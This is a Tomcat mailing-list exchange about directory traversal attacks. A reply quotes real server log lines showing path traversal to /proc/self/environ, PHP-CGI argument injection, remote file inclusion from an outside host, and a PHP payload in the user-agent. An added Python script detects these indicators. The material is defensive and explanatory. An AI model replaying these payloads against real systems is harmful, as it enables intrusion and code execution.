Athanasios Kostopoulos wrote:
On 22/11/12 10:52, Aditi Sinha wrote:
Hi Andre,

Agree with your points.

Just wanted to know more about "Directory Traversal Attack".
Can it lead to access of directories outside Tomcat/webapps folder also
or can it just try to access the applications within Tomcat/webapps
folder only?


Thanks & Regards,
Aditi

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Hi everyone,
OWASP maintains some nice resources about path traversal attacks. A nice starting point is the following:
https://www.owasp.org/index.php/Path_Traversal


And for anyone that would think that this is not a genuine concern, here are a few recent samples from a logfile of one of our servers (among many, many similar ones):

173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /index.php?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /main.php?x=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
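
As an added illustration (not part of the original thread), here is a small Python detector that applies the indicators visible in the log sample above (dot-dot traversal, `%00` truncation, `/proc/self/environ`, a remote URL in a parameter, and php.ini directives pushed through the query string) to combined-format access-log lines. The first three sample lines are quoted from the message above; the benign fourth line and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote, urlparse, parse_qsl

# Combined access-log layout (Apache httpd / Tomcat AccessLogValve "%h %l %u %t "%r" %s ...").
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')

# Three lines quoted from the message above, plus one constructed benign request.
SAMPLE_LINES = [
    r'173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"',
    r'173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"',
    r'173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"',
    r'10.0.0.5 - - [17/Nov/2012:16:01:02 +0100] "GET /docs/index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',  # constructed
]

def decode_fully(s, rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252e%252e) are seen too."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def classify(line):
    """Return the sorted indicator names present in one access-log line ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = decode_fully(m.group('target'))
    found = set()
    if re.search(r'\.\./|\.\.\\', target):            # dot-dot path traversal
        found.add('traversal')
    if '\x00' in target:                              # %00 used to truncate a filename
        found.add('null-byte')
    if '/proc/self/environ' in target:                # the file requested in the sample above
        found.add('proc-environ')
    for _, value in parse_qsl(urlparse(target).query, keep_blank_values=True):
        if re.match(r'(https?|ftp)://', value, re.I):  # parameter pointing at a remote file
            found.add('remote-include')
    if re.search(r'-d\s*(auto_prepend_file|allow_url_include|safe_mode)', target):
        found.add('php-cgi-directive')                # php.ini directives pushed via query string
    return sorted(found)

if __name__ == '__main__':
    for line in SAMPLE_LINES:
        print(LOG_RE.match(line).group('ip'), classify(line))
```

Decoding before matching matters: the `%2F` and `%00` in the sample lines only become `/` and a NUL byte after URL-decoding, so a raw substring search for `../` would miss several of them.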


